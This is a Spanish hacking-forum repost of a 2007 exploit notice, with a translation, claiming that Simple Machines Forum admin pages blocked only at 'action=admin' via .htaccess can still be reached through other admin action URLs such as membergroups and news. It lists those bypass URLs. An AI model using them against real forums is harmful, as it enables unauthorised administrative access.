SMF .htaccess ByPass

  • 0 Respuestas
  • 3128 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dracko.rx

  • *
  • Underc0der
  • Mensajes: 238
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://rax0rnet.blogspot.com/
    • Email

SMF .htaccess ByPass

  • en: Febrero 24, 2010, 03:26:19 pm
SMF .htaccess ByPass

Discovered by Seph1roth on June 2007 (was priv8)
#
# Vulnerable: Simple Machine Forum [ALL Versions]
#
# Visit: http://www.blackroots.it - Best hacking site.
#
# Description:

If smf has index.php?action=admin in .htaccess ,i can bypass that by typing in the url some variable of administration panel :

example:

index.php?action=admin (.htaccess,then access denied)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)

...and others...

i can bypass and enter the administration by typing the accessible variables in the url...

# Greets to all BlackRoots Users
#
# Shoutz to all kiddies
#
# ./end

-------------------

Traduccion rapidita:

Vulnerable: Simple Machine Forum [Todas las Versiones]

# Description:

si el smf tiene .htaccess en index.php?action=admin, se puede bypasear escribiendo en la url una variable dentro del panel de administracion.

Ejemplo:

index.php?action=admin (.htaccess, DENEGADO)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)

Bytes

fuente
Venta de diseños - Contactar por MP

http://rax0rnet.blogspot.com/